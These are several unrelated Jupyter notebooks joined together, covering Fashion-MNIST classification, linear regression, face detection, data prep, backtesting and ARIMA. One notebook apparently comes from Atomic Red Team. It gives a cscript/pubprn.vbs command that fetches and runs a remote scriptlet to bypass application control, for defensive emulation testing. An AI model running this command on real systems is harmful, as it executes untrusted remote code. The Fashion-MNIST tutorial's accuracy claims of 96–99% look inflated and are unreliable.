from matplotlib import pyplot
from keras.datasets import fashion_mnist
# load dataset
(trainX, trainy), (testX, testy) = fashion_mnist.load_data()
# summarize loaded dataset
print('Train: X=%s, y=%s' % (trainX.shape, trainy.shape))
print('Test: X=%s, y=%s' % (testX.shape, testy.shape))
# plot first few images
for i in range(9):
# define subplot
pyplot.subplot(330 + 1 + i)
# plot raw pixel data
pyplot.imshow(trainX[i], cmap=pyplot.get_cmap('gray'))
# show the figure
pyplot.show()
# Running the example loads the Fashion-MNIST train and test dataset and prints their shape.
#
# We can see that there are 60,000 examples in the training dataset and 10,000 in the test dataset and that images are indeed square with 28×28 pixels.
#
# A plot of the first nine images in the dataset is also created showing that indeed the images are grayscale photographs of items of clothing.
# # Model Evaluation Methodology
# The Fashion MNIST dataset was developed as a response to the wide use of the MNIST dataset, which has been effectively “solved” given the use of modern convolutional neural networks.
#
# Fashion-MNIST was proposed to be a replacement for MNIST, and although it has not been solved, it is possible to routinely achieve error rates of 10% or less. Like MNIST, it can be a useful starting point for developing and practicing a methodology for solving image classification using convolutional neural networks.
#
# Instead of reviewing the literature on well-performing models on the dataset, we can develop a new model from scratch.
#
# The dataset already has a well-defined train and test dataset that we can use.
#
# In order to estimate the performance of a model for a given training run, we can further split the training set into a train and validation dataset. Performance on the train and validation dataset over each run can then be plotted to provide learning curves and insight into how well a model is learning the problem.
#
# The Keras API supports this by specifying the “validation_data” argument to the model.fit() function when training the model, which will, in turn, return an object that describes model performance for the chosen loss and metrics on each training epoch.
#
# In order to estimate the performance of a model on the problem in general, we can use k-fold cross-validation, perhaps 5-fold cross-validation. This will give some account of the model’s variance with respect to both differences in the training and test datasets and the stochastic nature of the learning algorithm. The performance of a model can be taken as the mean performance across k-folds, given with the standard deviation, which could be used to estimate a confidence interval if desired.
#
# We can use the KFold class from the scikit-learn API to implement the k-fold cross-validation evaluation of a given neural network model. There are many ways to achieve this, although we can choose a flexible approach where the KFold is only used to specify the row indexes used for each split.
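A sketch of that index-only pattern (model building and fitting are omitted; `n_folds=5` follows the suggestion above):

```python
from numpy import arange
from sklearn.model_selection import KFold

def cross_validation_splits(n_samples, n_folds=5):
    """Yield (train_ix, test_ix) row indexes for each fold."""
    kfold = KFold(n_folds, shuffle=True, random_state=1)
    for train_ix, test_ix in kfold.split(arange(n_samples)):
        yield train_ix, test_ix

# each fold holds out 1/5 of the rows for evaluation
for train_ix, test_ix in cross_validation_splits(100):
    print(len(train_ix), len(test_ix))   # 80 20 on each of the 5 folds
```

These index arrays would then select rows from `trainX`/`trainY` when fitting and evaluating the model on each fold.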
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
from keras.utils.np_utils import to_categorical
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
# load train and test dataset
def load_dataset():
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
return trainX, trainY, testX, testY
# # Prepare Pixel Data
# We know that the pixel values for each image in the dataset are unsigned integers in the range between black and white, or 0 and 255.
#
# We do not know the best way to scale the pixel values for modeling, but we know that some scaling will be required.
#
# A good starting point is to normalize the pixel values of grayscale images, e.g. rescale them to the range [0,1]. This involves first converting the data type from unsigned integers to floats, then dividing the pixel values by the maximum value.
# convert from integers to floats
train_norm = trainX.astype('float32')
test_norm = testX.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# scale pixels
def prep_pixels(train, test):
# convert from integers to floats
train_norm = train.astype('float32')
test_norm = test.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# return normalized images
return train_norm, test_norm
# # Define Model
# Next, we need to define a baseline convolutional neural network model for the problem.
#
# The model has two main aspects: the feature extraction front end comprised of convolutional and pooling layers, and the classifier backend that will make a prediction.
#
# For the convolutional front-end, we can start with a single convolutional layer with a small filter size (3,3) and a modest number of filters (32) followed by a max pooling layer. The filter maps can then be flattened to provide features to the classifier.
#
# Given that the problem is a multi-class classification, we know that we will require an output layer with 10 nodes in order to predict the probability distribution of an image belonging to each of the 10 classes. This will also require the use of a softmax activation function. Between the feature extractor and the output layer, we can add a dense layer to interpret the features, in this case with 100 nodes.
#
# All layers will use the ReLU activation function and the He weight initialization scheme, both best practices.
#
# We will use a conservative configuration for the stochastic gradient descent optimizer with a learning rate of 0.01 and a momentum of 0.9. The categorical cross-entropy loss function will be optimized, suitable for multi-class classification, and we will monitor the classification accuracy metric, which is appropriate given we have the same number of examples in each of the 10 classes.
#
# The define_model() function below will define and return this model.
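Conceptually, the SGD-with-momentum configuration above corresponds to the classic update rule v ← momentum·v − lr·grad, w ← w + v. A toy sketch of that rule (this is not Keras's internal implementation), minimizing w²:

```python
# Toy illustration of the textbook momentum update rule; this is
# not Keras's internal code, just the conceptual form of the update.
def sgd_momentum_step(w, v, grad, lr=0.01, momentum=0.9):
    v = momentum * v - lr * grad  # velocity accumulates past gradients
    return w + v, v

w, v = 1.0, 0.0
for _ in range(3):
    w, v = sgd_momentum_step(w, v, grad=2.0 * w)  # gradient of w**2
```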
# define cnn model
def define_model():
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
model.add(MaxPooling2D((2, 2)))
model.add(Flatten())
model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
model.add(Dense(10, activation='softmax'))
# compile model
opt = SGD(lr=0.01, momentum=0.9)
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
return model
# # Evaluate Model
# After the model is defined, we need to evaluate it.
#
# The model will be evaluated using 5-fold cross-validation. The value of k=5 was chosen to provide a baseline for repeated evaluation while not being so large as to require a long running time. Each test set will be 20% of the training dataset, or about 12,000 examples, close to the size of the actual test set for this problem.
#
# The training dataset is shuffled prior to being split, and the same shuffling (via a fixed random seed) is performed each time, so that any model we evaluate will have the same train and test datasets in each fold, providing an apples-to-apples comparison.
#
# We will train the baseline model for a modest 10 training epochs with a default batch size of 32 examples. The test set for each fold will be used to evaluate the model both during each epoch of the training run, so we can later create learning curves, and at the end of the run, so we can estimate the performance of the model. As such, we will keep track of the resulting history from each run, as well as the classification accuracy of the fold.
#
# The evaluate_model() function below implements these behaviors, taking the training dataset as arguments and returning a list of accuracy scores and training histories that can be later summarized.
# evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
scores, histories = list(), list()
# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)
# enumerate splits
for train_ix, test_ix in kfold.split(dataX):
# define model
model = define_model()
# select rows for train and test
trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
# fit model
history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
# evaluate model
_, acc = model.evaluate(testX, testY, verbose=0)
print('> %.3f' % (acc * 100.0))
# append scores
scores.append(acc)
histories.append(history)
return scores, histories
# # Present Results
# Once the model has been evaluated, we can present the results.
#
# There are two key aspects to present: the diagnostics of the learning behavior of the model during training and the estimation of the model performance. These can be implemented using separate functions.
#
# First, the diagnostics involve creating a line plot showing model performance on the train and test set during each fold of the k-fold cross-validation. These plots are valuable for getting an idea of whether a model is overfitting, underfitting, or has a good fit for the dataset.
#
# We will create a single figure with two subplots, one for loss and one for accuracy. Blue lines will indicate model performance on the training dataset and orange lines will indicate performance on the hold out test dataset. The summarize_diagnostics() function below creates and shows this plot given the collected training histories.
# plot diagnostic learning curves
def summarize_diagnostics(histories):
for i in range(len(histories)):
# plot loss
pyplot.subplot(211)
pyplot.title('Cross Entropy Loss')
pyplot.plot(histories[i].history['loss'], color='blue', label='train')
pyplot.plot(histories[i].history['val_loss'], color='orange', label='test')
# plot accuracy
pyplot.subplot(212)
pyplot.title('Classification Accuracy')
pyplot.plot(histories[i].history['accuracy'], color='blue', label='train')
pyplot.plot(histories[i].history['val_accuracy'], color='orange', label='test')
pyplot.show()
# Next, the classification accuracy scores collected during each fold can be summarized by calculating the mean and standard deviation. This provides an estimate of the average expected performance of the model trained on this dataset, with an estimate of the average variance in the mean. We will also summarize the distribution of scores by creating and showing a box and whisker plot.
#
# The summarize_performance() function below implements this for a given list of scores collected during model evaluation.
# summarize model performance
def summarize_performance(scores):
# print summary
print('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))
# box and whisker plots of results
pyplot.boxplot(scores)
pyplot.show()
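The standard deviation reported above could also be turned into a rough confidence interval, as mentioned at the start of this section. A small sketch with made-up accuracy scores (the 1.96 multiplier assumes roughly normal errors, and `stdev` is the sample standard deviation):

```python
# Hedged sketch: a rough 95% confidence interval from fold scores.
# The scores below are illustrative, not results from this notebook.
from statistics import mean, stdev
from math import sqrt

def confidence_interval(scores, z=1.96):
    m, s, n = mean(scores), stdev(scores), len(scores)
    half = z * s / sqrt(n)  # standard error of the mean, scaled by z
    return m - half, m + half

lo, hi = confidence_interval([0.905, 0.912, 0.908, 0.915, 0.910])
```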
# run the test harness for evaluating a model
def run_test_harness():
# load dataset
trainX, trainY, testX, testY = load_dataset()
# prepare pixel data
trainX, testX = prep_pixels(trainX, testX)
# evaluate model
scores, histories = evaluate_model(trainX, trainY)
# learning curves
summarize_diagnostics(histories)
# summarize estimated performance
summarize_performance(scores)
# # Complete Example
# +
# baseline cnn model for fashion mnist
from numpy import mean
from numpy import std
from matplotlib import pyplot
from sklearn.model_selection import KFold
from keras.datasets import fashion_mnist
from keras.utils import to_categorical
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Dense
from keras.layers import Flatten
from keras.optimizers import SGD
# load train and test dataset
def load_dataset():
# load dataset
(trainX, trainY), (testX, testY) = fashion_mnist.load_data()
# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))
# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)
return trainX, trainY, testX, testY
# scale pixels
def prep_pixels(train, test):
# convert from integers to floats
train_norm = train.astype('float32')
test_norm = test.astype('float32')
# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# return normalized images
return train_norm, test_norm
# define cnn model
def define_model():
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
model.add(MaxPooling2D((2, 2)))
model.add(Flatten())
model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
model.add(Dense(10, activation='softmax'))
# compile model
opt = SGD(lr=0.01, momentum=0.9)
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
return model
# evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
scores, histories = list(), list()
# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)
# enumerate splits
for train_ix, test_ix in kfold.split(dataX):
# define model
model = define_model()
# select rows for train and test
trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
# fit model
history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
# evaluate model
_, acc = model.evaluate(testX, testY, verbose=0)
print('> %.3f' % (acc * 100.0))
# append scores
scores.append(acc)
histories.append(history)
return scores, histories
# plot diagnostic learning curves
def summarize_diagnostics(histories):
for i in range(len(histories)):
# plot loss
pyplot.subplot(211)
pyplot.title('Cross Entropy Loss')
pyplot.plot(histories[i].history['loss'], color='blue', label='train')
pyplot.plot(histories[i].history['val_loss'], color='orange', label='test')
# plot accuracy
pyplot.subplot(212)
pyplot.title('Classification Accuracy')
		pyplot.plot(histories[i].history['accuracy'], color='blue', label='train')
		pyplot.plot(histories[i].history['val_accuracy'], color='orange', label='test')
pyplot.show()
# summarize model performance
def summarize_performance(scores):
# print summary
print('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))
# box and whisker plots of results
pyplot.boxplot(scores)
pyplot.show()
# run the test harness for evaluating a model
def run_test_harness():
# load dataset
trainX, trainY, testX, testY = load_dataset()
# prepare pixel data
trainX, testX = prep_pixels(trainX, testX)
# evaluate model
scores, histories = evaluate_model(trainX, trainY)
# learning curves
summarize_diagnostics(histories)
# summarize estimated performance
summarize_performance(scores)
# entry point, run the test harness
run_test_harness()
# -
# Running the example prints the classification accuracy for each fold of the cross-validation process. This is helpful to get an idea that the model evaluation is progressing.
#
# We can see that for each fold, the baseline model achieved an error rate below 10%, and in two cases 98% and 99% accuracy. These are good results.
#
# Note: your specific results may vary given the stochastic nature of the learning algorithm.
# Next, a diagnostic plot is shown, giving insight into the learning behavior of the model across each fold.
#
# In this case, we can see that the model generally achieves a good fit, with train and test learning curves converging. There may be some signs of slight overfitting.
# Next, the summary of the model performance is calculated. We can see in this case, the model has an estimated skill of about 96%, which is impressive.
# Finally, a box and whisker plot is created to summarize the distribution of accuracy scores.
# All credit for this tutorial goes to <NAME>, PhD. I have merely followed his tutorial for my own learning purposes. You can check out his blog post on his website, "Machine Learning Mastery".
|
Clothing_Classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: .NET (PowerShell)
# language: PowerShell
# name: .net-powershell
# ---
# # T1216.001 - Signed Script Proxy Execution: Pubprn
# Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
#
# <code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.
# ## Atomic Tests
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
# ### Atomic Test #1 - PubPrn.vbs Signed Script Bypass
# Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
#
# **Supported Platforms:** windows
# #### Attack Commands: Run with `command_prompt`
# ```command_prompt
# cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct"
# ```
Invoke-AtomicTest T1216.001 -TestNumbers 1
# ## Detection
# Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
|
playbook/tactics/defense-evasion/T1216.001.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Libraries
#here I import the libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.datasets import load_boston
from sklearn import metrics
# ## (Part 1) load the data and some basic analysis
#here I set matplotlib to render plots inline
# %matplotlib inline
#here I create a new dataframe using the "predict_house_price" data
df = pd.read_csv("data/predict_house_price.csv")
#here I view the data
df.head()
#here I use the "info" method to see information about my dataframe (df)
df.info()
#here I use the "describe" method to see a basic statistical description of my dataframe (df)
df.describe()
#here I view the columns of my dataframe
df.columns
#here I use the "sns" library to create a pairwise scatter plot of the columns of my dataframe (df)
sns.pairplot(df)
#here I use the "sns" library to create a histogram of the "selling_price" column, with a kernel density estimate overlaid
sns.distplot(df["selling_price"])
#here I create a heatmap of the correlations using the "sns" library, with the "annot" option set to True
sns.heatmap(df.corr(), annot = True)
#here I view the columns of my dataframe (df)
df.columns
#here I create an "X" variable holding all columns of my dataframe (df) except "Adress" and "selling_price"
X = df[['mean_of_area_income', 'mean_of_area_house_age',
'mean_area_number_of_rooms', 'mean_area_number_of_bedrooms',
'population']]
#here I make my "X" variable be equal to the dataframe "df", but with the columns "Adress" and "selling_price" removed
X = df.drop(["Adress", "selling_price"], axis = 1)
#here I create a "y" variable from the "selling_price" column of my dataframe (df)
y = df["selling_price"]
#here I create 4 variables ("X_train", "X_test", "y_train", "y_test"): the train data ("X_train", "y_train") and the test data ("X_test", "y_test")
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.40, random_state=101)
#here I create an "lm" variable, an instance of the "LinearRegression" model
lm = LinearRegression()
#here I use the "fit" method of the "LinearRegression" model, passing the training data (X_train, y_train)
#this trains the algorithm on that data
lm.fit(X_train, y_train)
#here I print the intercept using the "intercept_" attribute
#this is the value at which the fitted line crosses the y-axis.
print(lm.intercept_)
#here I use the "coef_" attribute of my "LinearRegression" model
#this shows the estimated coefficients for the linear regression problem
lm.coef_
#here I view the columns of my X_train dataframe
X_train.columns
#here I create a new dataframe with the coefficient of each column (using "lm.coef_")
cdf = pd.DataFrame(lm.coef_, X.columns, columns = ["Coeff"])
cdf
#here I create a new variable "boston" using the load_boston() function
boston = load_boston()
#here I view the keys of this dataset, using the "keys()" method
boston.keys()
#for example, I view the "DESCR" information
print(boston["DESCR"])
#for example, I view the "data" information
print(boston["data"])
#for example, I view the "target" information
print(boston["target"])
# ## (Part 2) Predictions
#here I assign to the "Predictions" variable the output of the "predict" method of lm (LinearRegression) on the "X_test" data
Predictions = lm.predict(X_test)
#here I display the predictions made from the "X_test" data
Predictions
#here I can see the true values (by evaluating the variable "y_test")
y_test
#here I create a scatter plot of the true values against the predictions (as points)
plt.scatter(y_test, Predictions)
#here I create a histogram of the difference between the true values and the predictions, using the "distplot" function of the sns (seaborn) library
sns.distplot((y_test-Predictions))
#here we can see that the predictions are close to reality
#here I do the same as the previous graph, but using a newer, better-supported function
sns.histplot(y_test-Predictions,kde=True, stat="density", linewidth=0)
#here you see the mean absolute error of my predictions compared to the test data
#to compute this I use the "mean_absolute_error" function of the "metrics" module, passing the true values (y_test) and the predictions (Predictions)
metrics.mean_absolute_error(y_test, Predictions)
#here you see the mean squared error of my predictions compared to the test data
#to compute this I use the "mean_squared_error" function of the "metrics" module, passing the true values (y_test) and the predictions (Predictions)
metrics.mean_squared_error(y_test, Predictions)
#here you see the root mean square error of my predictions compared to the test data
#to compute this I use the "sqrt" function of the "np" library, passing the mean squared error
np.sqrt(metrics.mean_squared_error(y_test, Predictions))
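The three error metrics above are related in a simple way; a stdlib-only sketch with made-up values (not this notebook's actual data) shows how each is computed, and that RMSE is never smaller than MAE:

```python
from math import sqrt

# Toy true values and predictions, made up purely for illustration.
y_true = [3.0, 5.0, 2.5, 7.0]
y_pred = [2.5, 5.0, 4.0, 8.0]

errors = [t - p for t, p in zip(y_true, y_pred)]
mae = sum(abs(e) for e in errors) / len(errors)   # mean absolute error
mse = sum(e * e for e in errors) / len(errors)    # mean squared error
rmse = sqrt(mse)                                  # root mean squared error
```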
|
LINEAR_REGRESSION/IA_Python.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # HOG face detector using dlib
#
# Code is modified to run in jupyter notebook.
# Source from ageitgey:
# https://gist.github.com/ageitgey/1c1cb1c60ace321868f7410d48c228e1
# Tutorial article:
# https://medium.com/@ageitgey/machine-learning-is-fun-part-4-modern-face-recognition-with-deep-learning-c3cffc121d78#8b7d
import sys
import dlib
from skimage import io
# Take the image file name
file_name = "data/sample.jpg"
# +
# Create a HOG face detector using the built-in dlib class
face_detector = dlib.get_frontal_face_detector()
win = dlib.image_window()
# -
# Load the image into an array
image = io.imread(file_name)
# +
# Run the HOG face detector on the image data.
# The result will be the bounding boxes of the faces in our image.
detected_faces = face_detector(image, 1)
print("I found {} faces in the file {}".format(len(detected_faces), file_name))
# -
# Open a window on the desktop showing the image
win.set_image(image)
# Loop through each face we found in the image
for i, face_rect in enumerate(detected_faces):
# Detected faces are returned as an object with the coordinates
# of the top, left, right and bottom edges
print("- Face #{} found at Left: {} Top: {} Right: {} Bottom: {}".format(i, face_rect.left(), face_rect.top(), face_rect.right(), face_rect.bottom()))
# Draw a box around each face we found
win.add_overlay(face_rect)
|
_templates/dlib_HOGfacedetector.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python36
# ---
# 
# # Custom Python Transforms
#
# There will be scenarios when the easiest thing for you to do is just to write some Python code. This SDK provides three extension points that you can use.
#
# 1. New Script Column
# 2. New Script Filter
# 3. Transform Partition
#
# Each of these is supported in both the scale-up and the scale-out runtime. A key advantage of using these extension points is that you don't need to pull all of the data in order to create a dataframe. Your custom Python code will be run just like other transforms: at scale, by partition, and typically in parallel.
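As a toy, stdlib-only illustration of the per-partition idea (this is not the SDK's actual execution machinery): because the custom function sees one partition at a time, partitions can be processed independently, and hence in parallel.

```python
# Toy sketch of per-partition processing. Each partition is handled
# independently, so the list comprehension below could just as well
# be a parallel map over partitions.
def fill_missing(partition):
    return [v if v is not None else 0 for v in partition]

partitions = [[1, None, 3], [None, 5], [6]]
processed = [fill_missing(p) for p in partitions]
flat = [v for p in processed for v in p]
```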
# ## Initial data prep
# We start by loading crime data.
# +
import azureml.dataprep as dprep
col = dprep.col
dflow = dprep.read_csv(path='../data/crime-spring.csv')
dflow.head(5)
# -
# We trim the dataset down and keep only the columns we are interested in.
dflow = dflow.keep_columns(['Case Number','Primary Type', 'Description', 'Latitude', 'Longitude'])
dflow = dflow.replace_na(columns=['Latitude', 'Longitude'], custom_na_list='')
dflow.head(5)
# We look for null values using a filter. We found some, so now we'll look at a way to fill these missing values.
dflow.filter(col('Latitude').is_null()).head(5)
# ## Transform Partition
# We want to replace all null values with a 0, so we decide to use a handy pandas function. This code will be run by partition, not on all of the dataset at a time. This means that on a large dataset, this code may run in parallel as the runtime processes the data partition by partition.
# +
pt_dflow = dflow
def transform(df, index):
df['Latitude'].fillna('0',inplace=True)
df['Longitude'].fillna('0',inplace=True)
return df
dflow = pt_dflow.map_partition(fn=transform)
dflow.head(5)
# -
# ### Transform Partition With File
# Being able to use any Python code to manipulate your data as a pandas DataFrame is extremely useful for complex and specific data operations that DataPrep doesn't handle natively. Unfortunately, such code isn't very testable when it is just sitting inside a string.
# To improve testability and ease of script writing, there is another transform-partition interface, transform_partition_with_file, which takes the path to a Python script that must contain a function matching the 'transform' signature defined above.
#
# The `script_path` argument should be a relative path to ensure Dataflow portability. Here `map_func.py` contains the same code as in the previous example.
dflow = pt_dflow.transform_partition_with_file('../data/map_func.py')
dflow.head(5)
# ## New Script Column
# We want to create a new column that has both the latitude and longitude. We can achieve this easily using a [Data Prep expression](./add-column-using-expression.ipynb), which is faster in execution. Alternatively, we can do this in Python using the `new_script_column()` method on the dataflow. Note that we use custom Python code here for demo purposes only; in practice, you should prefer Data Prep's native functions and fall back to custom Python code only when the functionality is not available in Data Prep.
dflow = dflow.new_script_column(new_column_name='coordinates', insert_after='Longitude', script="""
def newvalue(row):
return '(' + row['Latitude'] + ', ' + row['Longitude'] + ')'
""")
dflow.head(5)
# ## New Script Filter
# Now we want to filter the dataset down to only the crimes that incurred over $300 in loss. We can build a Python expression that returns True if we want to keep the row, and False to drop the row.
dflow = dflow.new_script_filter("""
def includerow(row):
val = row['Description']
return 'OVER $ 300' in val
""")
dflow.head(5)
|
how-to-use-azureml/work-with-data/dataprep/how-to-guides/custom-python-transforms.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#%%
from vnpy.app.cta_strategy.backtesting import BacktestingEngine, OptimizationSetting
from vnpy.app.cta_strategy.strategies.atr_rsi_strategy import (
AtrRsiStrategy,
)
from datetime import datetime
#%%
engine = BacktestingEngine()
engine.set_parameters(
vt_symbol="IF88.CFFEX",
interval="1m",
start=datetime(2019, 1, 1),
end=datetime(2019, 4, 30),
rate=0.3/10000,
slippage=0.2,
size=300,
pricetick=0.2,
capital=1_000_000,
)
engine.add_strategy(AtrRsiStrategy, {})
#%%
engine.load_data()
engine.run_backtesting()
df = engine.calculate_result()
engine.calculate_statistics()
engine.show_chart()
# +
setting = OptimizationSetting()
setting.set_target("sharpe_ratio")
setting.add_parameter("atr_length", 3, 39, 1)
setting.add_parameter("atr_ma_length", 10, 30, 1)
engine.run_ga_optimization(setting)
|
examples/cta_backtesting/backtesting_demo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import matplotlib.pyplot as plt
import datetime as dt
import numpy as np
from numpy import log
import pandas as pd
import os
from statsmodels.tsa.stattools import adfuller
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.arima_model import ARIMA
from statsmodels.tsa.stattools import acf
# +
#12
# +
from statsmodels.tsa.arima_model import ARIMA
import pmdarima as pm
df = pd.read_csv('2010_zip_4_monthly_data.csv', names=['value'], header=0)
model = pm.auto_arima(df.value, start_p=1, start_q=1,
test='adf', # use adftest to find optimal 'd'
max_p=3, max_q=3, # maximum p and q
m=1, # frequency of series
d=None, # let model determine 'd'
seasonal=False, # No Seasonality
start_P=0,
D=0,
trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
print(model.summary())
# +
# 13
# -
model.plot_diagnostics(figsize=(7,5))
plt.show()
# +
# Forecast
n_periods = 24
fc, confint = model.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = np.arange(len(df.value), len(df.value)+n_periods)
# make series for plotting purpose
fc_series = pd.Series(fc, index=index_of_fc)
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot
plt.plot(df.value)
plt.plot(fc_series, color='darkgreen')
plt.fill_between(lower_series.index,
lower_series,
upper_series,
color='k', alpha=.15)
plt.title("Houston New Franchise Growth Forecast Area 4")
plt.show()
# -
confint
# +
#14
# +
# Import
data = pd.read_csv('2010_zip_4_monthly_data.csv', parse_dates=['date'], index_col='date')
# Plot
fig, axes = plt.subplots(2, 1, figsize=(10,5), dpi=100, sharex=True)
# Usual Differencing
axes[0].plot(data[:], label='Original Series')
axes[0].plot(data[:].diff(1), label='Usual Differencing')
axes[0].set_title('Usual Differencing')
axes[0].legend(loc='upper left', fontsize=10)
# Seasonal Differencing
axes[1].plot(data[:], label='Original Series')
axes[1].plot(data[:].diff(12), label='Seasonal Differencing', color='green')
axes[1].set_title('Seasonal Differencing')
plt.legend(loc='upper left', fontsize=10)
plt.suptitle('Number of Companies at Area 4', fontsize=16)
plt.show()
# +
# # !pip3 install pyramid-arima
import pmdarima as pm
# Seasonal - fit stepwise auto-ARIMA
smodel = pm.auto_arima(data, start_p=1, start_q=1,
test='adf',
max_p=3, max_q=3, m=12,
start_P=0, seasonal=True,
d=None, D=1, trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
smodel.summary()
# -
smodel.plot_diagnostics(figsize=(7,5))
plt.show()
# +
# Forecast
n_periods = 24
fitted, confint = smodel.predict(n_periods=n_periods, return_conf_int=True)
index_of_fc = pd.date_range(data.index[-1], periods = n_periods, freq='MS')
# make series for plotting purpose
fitted_series = pd.Series(fitted, index=index_of_fc)
lower_series = pd.Series(confint[:, 0], index=index_of_fc)
upper_series = pd.Series(confint[:, 1], index=index_of_fc)
# Plot
plt.plot(data)
plt.plot(fitted_series, color='darkgreen')
plt.fill_between(lower_series.index,
lower_series,
upper_series,
color='k', alpha=.15)
plt.title("SARIMA - Final Forecast for Number of New Franchise at Area 4")
plt.show()
# -
confint
# +
#15
# -
# Import Data
data = pd.read_csv('2010_zip_4_monthly_data.csv', parse_dates=['date'], index_col='date')
# +
# Compute Seasonal Index
from statsmodels.tsa.seasonal import seasonal_decompose
from dateutil.parser import parse
# multiplicative seasonal component
result_mul = seasonal_decompose(data['value'][-36:], # 3 years
model='multiplicative',
extrapolate_trend='freq')
seasonal_index = result_mul.seasonal[-12:].to_frame()
seasonal_index['month'] = pd.to_datetime(seasonal_index.index).month
# merge with the base data
data['month'] = data.index.month
df = pd.merge(data, seasonal_index, how='left', on='month')
df.columns = ['value', 'month', 'seasonal_index']
df.index = data.index # reassign the index.
# +
import pmdarima as pm
# SARIMAX Model
sxmodel = pm.auto_arima(df[['value']], exogenous=df[['seasonal_index']],
start_p=1, start_q=1,
test='adf',
max_p=3, max_q=3, m=12,
start_P=0, seasonal=True,
d=None, D=1, trace=True,
error_action='ignore',
suppress_warnings=True,
stepwise=True)
sxmodel.summary()
# -
|
arima_ml_models/models/auto_model/Model_zip4.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.4.2
# language: julia
# name: julia-0.4
# ---
